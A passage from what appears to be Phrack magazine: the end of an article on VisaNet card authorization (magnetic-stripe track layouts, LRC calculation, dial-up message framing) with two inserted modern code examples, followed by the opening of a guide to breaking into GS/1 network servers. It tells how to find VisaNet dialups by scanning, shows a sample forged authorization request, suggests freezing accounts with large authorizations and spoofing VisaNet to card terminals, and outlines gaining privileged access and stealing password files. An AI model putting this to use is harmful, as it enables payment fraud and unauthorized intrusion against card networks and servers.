7.1 TRACK 1 CHARACTER DEFINITION

Table 7.01 provides the ISO 7811-2 track 1 character encoding definitions.
This "standards" format is a SAMPLE guideline for expected credit card track
encoding; ATM/debit cards may differ. Actual cards may differ [not], whether
they are Visa cards or any other issuer's cards.

Each character is defined by the six-bit codes listed in Table 7.01.
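
The three operations listed in section 7.0 (parity and LRC check, discarding the framing characters, conversion to ANSI X3.4), as an added Python example that is not part of the VisaNet document or of this article. It generalizes over both tracks using the bit layouts of Tables 7.01 and 7.02 and the LRC rule of section 7.06; all names are hypothetical, the track 2 separator is left as the "=" listed in Figure 7.02, and the LRC character's own parity bit is not checked.

```python
"""Check a raw magnetic-stripe read before it is used in a request message.

Added example; names are hypothetical. A read is modelled as a list of 0/1
values, each character sent LSB first and followed by its odd parity bit.
"""

# track: (data bits per character, offset to ANSI X3.4, start sentinel,
#         end sentinel, maximum characters including SS, ES and LRC)
TRACKS = {
    1: (6, 0x20, "%", "?", 79),
    2: (4, 0x30, ";", "?", 40),
}

# Constructed test data (a widely published test number), not a real card.
SAMPLE_TRACK2 = "4111111111111111=99121010000"


class TrackReadError(ValueError):
    """Raised when a read fails a length, parity, LRC or framing check."""


def _lrc(codes):
    """XOR of all data bits, so every bit column has an even count of ones."""
    value = 0
    for code in codes:
        value ^= code
    return value


def encode_track(track, text):
    """Build a constructed read: the bits for SS + text + ES + LRC."""
    nbits, offset, ss, es, _ = TRACKS[track]
    codes = [ord(ch) - offset for ch in ss + text + es]
    if any(not 0 <= code < (1 << nbits) for code in codes):
        raise ValueError("character outside the track character set")
    bits = []
    for code in codes + [_lrc(codes)]:
        data = [(code >> i) & 1 for i in range(nbits)]     # LSB first
        # Odd parity per character. Applying it to the LRC character as well
        # is an assumption of this example; decode_track() does not use it.
        bits += data + [1 - sum(data) % 2]
    return bits


def decode_track(track, bits):
    """Return the converted track data, or raise TrackReadError."""
    nbits, offset, ss, es, max_chars = TRACKS[track]
    width = nbits + 1
    count, leftover = divmod(len(bits), width)
    if leftover or count < 3 or count > max_chars:
        raise TrackReadError("bad read length: %d bits" % len(bits))
    codes = []
    for index in range(count):
        frame = bits[index * width:(index + 1) * width]
        is_lrc = index == count - 1
        if not is_lrc and sum(frame) % 2 != 1:
            raise TrackReadError("parity error in character %d" % index)
        codes.append(sum(bit << i for i, bit in enumerate(frame[:nbits])))
    *framed, read_lrc = codes
    # Step 1: the LRC covers the start sentinel, the data and the end sentinel.
    if _lrc(framed) != read_lrc:
        raise TrackReadError("LRC mismatch")
    # Step 3: one-for-one conversion to the request message character set.
    chars = "".join(chr(code + offset) for code in framed)
    if chars[0] != ss or chars[-1] != es:
        raise TrackReadError("missing start or end sentinel")
    # Step 2: sentinels and LRC are discarded, nothing else is touched.
    return chars[1:-1]
```

A read with two flipped data bits in one character passes every parity check and is only caught by the LRC comparison, which is why the procedure requires both.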
Track 1 can be encoded with up to 79 characters as shown in Figure 7.01 +---------------------------------------------------------+ |SS|FC| PAN|FS| NAME|FS| DATE| DISCRETIONARY DATA |ES|LRC| +---------------------------------------------------------+ LEGEND: Field Description Length Format -------------------------------------------------------------------------------- SS Start Sentinel 1 % FC Format Code ("B" for credit cards) 1 A/N PAN Primary Account Number 19 max NUM FS Field Separator 1 ^ NAME Card Holder Name (See NOTE below) 26 max A/N FS Field Separator 1 ^ DATE Expiration Date (YYMM) 4 NUM Discretionary Data Option Issuer Data (See NOTE below) variable A/N ES End Sentinel 1 ? LRC Longitudinal Redundancy Check 1 --- Total CAN NOT exceed 79 bytes-----> 79 -------------------------------------------------------------------------------- FIGURE 7.01 Track 1 Encoding Definition NOTE: The CARD HOLDER NAME field can include a "/" as the surname separator and a "." as the title separator The DISCRETIONARY DATA can contain any of the printable characters from Table 7.01 TABLE 7.01 Track 1 Character Definition b6 0 0 1 1 BIT NUMBER b5 0 1 0 1 (a) These character positions ------------------------------------------- are for hardware use only b4 b3 b2 b1 ROW/COL 0 1 2 3 ------------------------------------------- (b) These characters are for 0 0 0 0 0 SP 0 (a) P country use only, not for 0 0 0 1 1 (a) 1 A Q international use 0 0 1 0 2 (a) 2 B R 0 0 1 1 3 (c) 3 C S (c) These characters are 0 1 0 0 4 $ 4 D T reserved for added 0 1 0 1 5 (%) 5 E U graphic use [nifty] 0 1 1 0 6 (a) 6 F V 0 1 1 1 7 (a) 7 G W 1 0 0 0 8 ( 8 H X (%) Start sentinel 1 0 0 1 9 ) 9 I Y (/) End sentinel 1 0 1 0 A (a) (a) J Z (^) Field Separator 1 0 1 1 B (a) (a) K (b) / Surname separator 1 1 0 0 C (a) (a) L (b) . Title separator 1 1 0 1 D - (a) M (b) SP Space 1 1 1 0 E - (a) N (^) +-----------------------+ 1 1 1 1 F / (?) 
O (a) |PAR|MSB|B5|B4|B3|B2|LSB| +-+---+-----------------+ | |--- Most Significant Bit |--- Parity Bit (ODD) Read LSB First 7.02 TRACK 2 CHARACTER DEFINITION Table 7.02 provides the ISO 7811-2 track 2 character encoding definitions. This "standards" format is a SAMPLE guideline for expected credit card track encoding; ATM/debit cards may differ. Actual cards may differ, whether they are Visa cards or any other issuer's cards. Each character is defined by the four-bit codes listed in Table 7.02. Track 2 can be encoded with up to 40 characters as shown in Figure 7.02. +--------------------------------------------------------+ |SS| PAN |FS| DATE| DISCRETIONARY DATA |ES|LRC| +--------------------------------------------------------+ LEGEND: Field Description Length Format -------------------------------------------------------------------------------- SS Start Sentinel 1 0B hex PAN Primary Account Number 19 max NUM FS Field Separator 1 = Discretionary Data Option Issuer Data (See NOTE below) variable A/N ES End Sentinel 1 0F hex LRC Longitudinal Redundancy Check 1 --- Total CAN NOT exceed 40 bytes-----> 40 -------------------------------------------------------------------------------- FIGURE 7.02 Track 2 Encoding Definition NOTE: The PAN and DATE are always numeric. The DISCRETIONARY DATA can be numeric with optional field separators as specified in Table 7.02. TABLE 7.02 Track 2 Character Set b4 b3 b2 b1 COL (a) These characters are for ------------------------------ hardware use only 0 0 0 0 0 0 0 0 0 1 1 1 (B) Starting Sentinel 0 0 1 0 2 2 0 0 1 1 3 3 (D) Field Separator 0 1 0 0 4 4 0 1 0 1 5 5 (F) Ending Sentinel 0 1 1 0 6 6 0 1 1 1 7 7 1 0 0 0 8 8 +---------------------------+ 1 0 0 1 9 9 | PAR | MSB | b3 | b2 | LSB | 1 0 1 0 A (a) +---------------------------+ 1 0 1 1 B (B) | | 1 1 0 0 C (a) | |--- Most Significant Bit 1 1 0 1 D (D) |--- Parity Bit (ODD) 1 1 1 0 E (a) 1 1 1 1 F (F) Read LSB first [ tables 7.03a, 7.03b, and 7.04 deleted... 
  If you really need a fucking ascii table that bad go buy a book.]

[ section 7.05 - Account Data Luhn Check deleted...
  as being unnecessarily obtuse and roundabout in explaining how the check
  works. the routine written by crazed luddite and murdering thug is much
  clearer. ]

7.06 CALCULATING AN LRC

When creating or testing the LRC for the read of the card swipe, the
authorization request record, the debit confirmation record or the VisaNet
response record, use the following steps to calculate the LRC:

1) The value of each bit in the LRC character, excluding the parity bit,
   is defined such that the total count of ONE bits encoded in the
   corresponding bit location of all characters of the data shall be even
   (this is also known as an EXCLUSIVE OR (XOR) operation).

   For card swipes, include the start sentinel, all the data read and the
   end sentinel.

   For VisaNet protocol messages, begin with the first character past the
   STX, up to and including the ETX.

2) The LRC character's parity bit is not a parity bit for the individual
   parity bits of the data message, but is only the parity bit for the LRC
   character itself. Calculated as an even parity bit.

[ i list a routine for calculating an LRC of a string later on in the
  document ]

7.07 TEST DATA FOR RECORD FORMAT "J"

The following two sections provide sample data for testing record format "J"
with the VisaNet dial system.

7.07.01 TEST DATA FOR A FORMAT "J" AUTHORIZATION REQUEST

Table 7.07a provides a set of test data for record format "J" authorization
request.

TABLE 7.07a  Test Data For Record Format "J"

Test Data       Byte #   Length    Format  Field Name
--------------------------------------------------------------------------------
J               1        1         A/N     Record Format
0, 2, or 4      2        1         A/N     Application Type
.               3        1         A/N     Message Delimiter
401205          4-9      6         A/N     Acquirer BIN
123456789012    10-21    12        NUM     Merchant Number
0001         *  22-25    4         NUM     Store Number
0001         *  26-29    4         NUM     Terminal Number
5999            30-33    4         NUM     Merchant Category Code
840             34-36    3         NUM     Merchant Country Code
94546           37-41    5         A/N     Merchant City Code
108             42-44    3         NUM     Time Zone Differential
54              45-46    2         A/N     Authorization Transaction Code
12345678        47-54    8         NUM     Terminal Identification Number
Y               55       1         A/N     Payment Service Indicator
0001         *  56-59    4         NUM     Transaction Sequence Number
@               60       1         A/N     Cardholder Identification Code
D, H, T, or X   61       1         A/N     Account Data Source
Track or                                   Customer Data Field
Manual Data
"FS"            N.A.     1         "FS"    Field Separator
0000123         N.A.     0 to 43   A/N     Transaction Amount
"FS"            N.A.     1         "FS"    Field Separator
ER              N.A.     0 or 2    A/N     Device Code/Industry code
"FS"            N.A.     1         "FS"    Field Separator
                N.A.     0 or 6    NUM     Issuing/Receiving Institution ID
"FS"            N.A.     1         "FS"    Field Separator
000             N.A.     3 to 12   NUM     Secondary Amount (Cashback)
"FS"            N.A.     1         "FS"    Field Separator
--------------------------------------------------------------------------------
NOTE: * Denotes fields that are returned in the response message

7.07.2 RESPONSE MESSAGE FOR TEST DATA

Table 7.07b provides the response message for the test data provided in
section 7.07.1.
TABLE 7.07b  Response Message For Test Data - Record Format "J"

Test Data       Byte #   Length    Format  Field Name
--------------------------------------------------------------------------------
A, Y, N, or  *  1        1         A/N     Payment Service Indicator
"space"
0001         *  2-5      4         NUM     Store Number
0001         *  6-9      4         NUM     Terminal Number
5            *  1        1         A/N     Authorization Source Code
0001         *  11-14    4         NUM     Transaction Sequence Number
00           *  15-16    2         A/N     Response Code
12AB45       *  17-22    6         A/N     Approval Code
111992       *  23-28    6         NUM     Transaction Date (MMDDYY)
AP ______       29-44    16        A/N     Authorization Response Message
0, Sp, or "FS"  45       1         A/N     AVS Result Code
*Variable                0 or 15   NUM     Transaction Identifier
"FS"                               "FS"    Field Separator
*Variable                0 or 4    A/N     Validation Code
"FS"                               "FS"    Field Separator
--------------------------------------------------------------------------------
NOTE: * Move to data capture record for VisaNet Central Data Capture (CDC)

--------------------------------------------------------------------------------

[ section two ]
[ finding visanet ]

finding visanet isn't hard, but it can be tedious. visanet rents time off of
compuserve and X.25 networks. the compuserve nodes used are not the same as
their information service, cis. to identify a visanet dialup after
connecting, watch for three enq characters and a three second span to hangup.
if you've scanned out a moderate portion of your area code, you probably have
a few dialups. one idea is to write a short program to dial all the connects
you have marked as garbage or worthless [ you did keep em, right? ] and wait
for the proper sequence. X.25 connections should work similarly, but i don't
know for sure. read the section on visanet usage for other dialup sources.

[ section three ]
[ visanet link level protocol ]

messages to/from visanet have a standard format:

    stx - message - etx - lrc

the message portion is the record formats covered in section one. lrc values
are calculated starting with the first byte of message, going up to and
including the etx character.
here's an algorithm that calculates the lrc for a string. note: in order to
work with the visanet protocols, append etx to the string before calling this
function.

    unsigned char func_makelrc(char *buff)
    {
        unsigned char ch = 0;   /* running xor of every byte seen so far */
        char *p;

        /* stop at the terminating nul; an empty string gives an lrc of 0 */
        for (p = buff; *p; p++)
            ch ^= (unsigned char)*p;
        return ch;
    }

for a single authorization exchange, the easiest kind of transaction, the
sequence goes like this:

    host  enq                        stx-response-etx-lrc       eot
    term       stx-request-etx-lrc                         ack

matching this sequence with test record formats from section one, 7.07,
here's an ascii representation of a transaction. control characters denoted
in <>'s. [of course, you wouldn't really have a carriage return in middle of
a message. duh. ] this transaction would be for card number 4444111122223333
with an expiration date of 04/96. the purchase amount is $1.23. visanet
responds with an approval code of 12ab45.

    host:
    term: J0.401205123456789012000100015999840945461085412345678Y0001@H444411
          112222333304960000123ER000
    host: Y00010001500010012AB45111992APPROVAL 12AB45123456789012345 ABCD
    term:
    host:

authorizing multiple transactions during one connect session is only slightly
more complicated. the etx character on all messages sent to visanet are
changed to etb and the application type is changed from '0' to '2' [section
one 4.02]. instead of responding after a transaction with eot, visanet
instead polls the terminal again with enq. this continues until the terminal
either changes back to the single transaction format or issues an eot to the
host.
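Added example, not part of the original article: a receive-side integrity check for the stx - message - etx/etb - lrc framing described above. func_makelrc stops at the first nul byte, so it cannot handle a frame whose lrc works out to 0x00; this version takes an explicit length and accepts any value in the lrc position. The names lrc_bytes, check_frame and frame_status are made up for this illustration, and parity bits are assumed to have been stripped before the buffer is checked.

```c
#include <stddef.h>

#define STX 0x02
#define ETX 0x03
#define ETB 0x17

enum frame_status { FRAME_OK, FRAME_NO_STX, FRAME_TRUNCATED, FRAME_BAD_LRC };

/* xor of len bytes; length-based, so a result or data byte of 0x00 is fine */
unsigned char lrc_bytes(const unsigned char *p, size_t len)
{
    unsigned char lrc = 0;
    while (len--)
        lrc ^= *p++;
    return lrc;
}

/*
 * Validate one received frame: [ack] stx message etx|etb lrc.
 * On FRAME_OK, *msg and *msg_len describe the message without framing
 * bytes, and *last is 1 for etx (final message) or 0 for etb (more follow).
 */
enum frame_status check_frame(const unsigned char *buf, size_t len,
                              const unsigned char **msg, size_t *msg_len,
                              int *last)
{
    size_t start = 0, end;

    while (start < len && buf[start] != STX)   /* skip a leading ack */
        start++;
    if (start == len)
        return FRAME_NO_STX;
    start++;                                   /* first byte past stx */

    end = start;
    while (end < len && buf[end] != ETX && buf[end] != ETB)
        end++;
    if (end + 1 >= len)                        /* need terminator and lrc */
        return FRAME_TRUNCATED;

    /* the lrc covers the message plus its terminator; the lrc byte is
       compared as-is because it may equal stx, nak or any other value */
    if (lrc_bytes(buf + start, end - start + 1) != buf[end + 1])
        return FRAME_BAD_LRC;

    *msg = buf + start;
    *msg_len = end - start;
    *last = (buf[end] == ETX);
    return FRAME_OK;
}
```
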
here's a short list of all control characters used:

stx: start-of-text, first message framing character signaling message start
etx: end-of-text, the frame ending character for the last message of a
     sequence
eot: end-of-transmission, used to end an exchange and signal disconnect
enq: enquiry, an invitation to transmit a message or retransmit last item
ack: affirmative acknowledgment, follows correct reception of message
nak: negative acknowledgment, used to indicate that the message was not
     understood or was received with errors
syn: delay character, wait thirty seconds
etb: end-of-block, the end framing character used to signal the end of a
     message within a multiple message sequence

other quick notes:

visanet sometimes sends ack before stx on responses
lrc characters can hold any value, such as stx, nak, etc
visanet can say goodbye at any time by sending eot
people can get very anal about error flow diagrams

[ section four ]
[ half the story; central data capture ]

a full transaction requires two steps, one of which is described in this
document: getting the initial authorization. an authorization does basically
nothing to a person's account. oh, you could shut somebody's account down for
a day or two by requesting a twenty thousand dollar authorization, but no
other ill effects would result. central data capture, the second and final
step in a transaction, needs information from both the authorization request
and response, which is used to generate additional data records. these
records are then sent to visanet by the merchant in a group, usually at the
end of each day.

[ section five ]
[ common applications ]

access to visanet can be implemented in a number of ways: directly on a pos
terminal, indirectly via a lan, in a hardware specific device, or any
permutation possible to perform the necessary procedures. card swipers
commonly seen at malls are low tech, leased at around fifty dollars per
month, per terminal.
they have limited capacity, but are useful in that all of the information
necessary for transactions is self contained. dr delam and maldoror found
this out, and were delighted to play the role of visanet in fooling the
little device. close scrutiny of section one reveals atm formats, phone order
procedures, and new services such as direct debit from checking/savings and
checks by phone. start noticing the stickers for telecheck and visa atm
cards, and you're starting to get the picture.

[ section seven ]
[ brave new world ]

could it be? yes, expiration dates really don't matter....
this article written to thank previous Phrack writers...
please thank me appropriately...
800#s exist...
other services exist... mastercard runs one...
never underestimate the power of asking nicely...
numerous other formats are available... see section one, 3.0 for hints...
never whistle while you're pissing...

                         ==Phrack Magazine==

              Volume Five, Issue Forty-Six, File 17 of 28

****************************************************************************

[<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]
[<>                                                                     <>]
[<>    ----+++===::: GETTiN' D0wN 'N D1RTy wiT Da GS/1 :::===+++----    <>]
[<>                                                                     <>]
[<> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <>]
[<>                                                                     <>]
[<>     Brought to you by:                                              <>]
[<>     [)elam0 Labz, Inc. and ChURcH oF ThE Non-CoNForMisT             <>]
[<>                                                                     <>]
[<>     Story line: Maldoror -n- [)r. [)elam                            <>]
[<>     Main Characters: Menacing Maldoror & The Evil [)r. [)elam       <>]
[<>     Unix Technical Expertise: Wunder-Boy [)elam                     <>]
[<>     Sysco Technishun: Marvelous Maldoror                            <>]
[<>                                                                     <>]
[<>     Look for other fine [)elamo Labz and ChURcH oF ThE              <>]
[<>     Non-CoNForMisT products already on the market such as           <>]
[<>     DEPL (Delam's Elite Password Leecher), NUIA (Maldoror's         <>]
[<>     Tymnet NUI Attacker), TNET.SLT (Delam's cheap0 Telenet          <>]
[<>     skanner for Telix), PREFIX (Maldoror's telephone prefix         <>]
[<>     identification program), and various other programs and         <>]
[<>     philez written by Dr. Delam, Maldoror, Green Paradox,           <>]
[<>     El Penga, Hellpop, and other certified DLI and CNC members.     <>]
[<>                                                                     <>]
[>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>]

Index
========================================
1. Finding and identifying a GS/1
2. Getting help
3. Gaining top privilege access
4. Finding the boot server
5. Connecting to the boot server
6. Getting the boot server password file
7. Other avenues

----------------------------------------------------------------------------

Here's hacking a GS/1 made EZ (for the sophisticated hacker). It is
advisable to fill your stein with Sysco and pay close attention... if Sysco
is not available in your area, Hacker Pschorr beer will work almost as
good... (especially Oktoberfest variety)

What is a GS/1?
---------------
A GS/1 allows a user to connect to various other computers... in other
words, it's a server, like a DEC or Xyplex.

So why hack it?
---------------
Cuz itz there... and plus you kan access all sortz of net stuph fer phree.
(QSD @ 208057040540 is lame and if you connect to it, you're wasting the
GS/1.. the French fone police will fly over to your country and hunt you
down like a wild pack of dogs, then hang you by your own twisted pair.)

What to do:
-----------

+--------------------------------------+
+  #1. Finding and identifying a GS/1  +
+--------------------------------------+

Find a GS/1 .. they're EZ to identify..
they usually have a prompt of GS/1, though the prompt can be set to whatever
you want it to be. A few years ago there were quite a number of GS/1's
laying around on Tymnet and Telenet... you can still find a few if you scan
the right DNIC's. (If you don't know what the hell I'm talking about, look
at some old Phracks and LOD tech. journals.)

The prompt will look similar to this:

(!2) GS/1>

(The (!2) refers to the port you are on)

+--------------------+
+  #2. Getting help  +
+--------------------+

First try typing a '?' to display help items.

A help listing looks like this:

> (!2) GS/1>?
>    Connect [, ] [ ECM ] [ Q ]
>    DO
>    Echo
>    Listen
>    Pause []
>    PIng [ timeout ]
>    SET = ...
>    SHow ...

At higher privileges such as global (mentioned next) the help will look like
this (note the difference in the GS/1 prompt with a # sign):

> (!2) GS/1# ?
>    BRoadcast ( )
>    Connect ( ) [, ] [ ECM ] [ Q ]
>    DEFine = ( )
>    DisConnect ( ) []
>    DO ( )
>    Echo
>    Listen ( )
>    Pause []
>    PIng [ timeout ]
>    ReaD ( )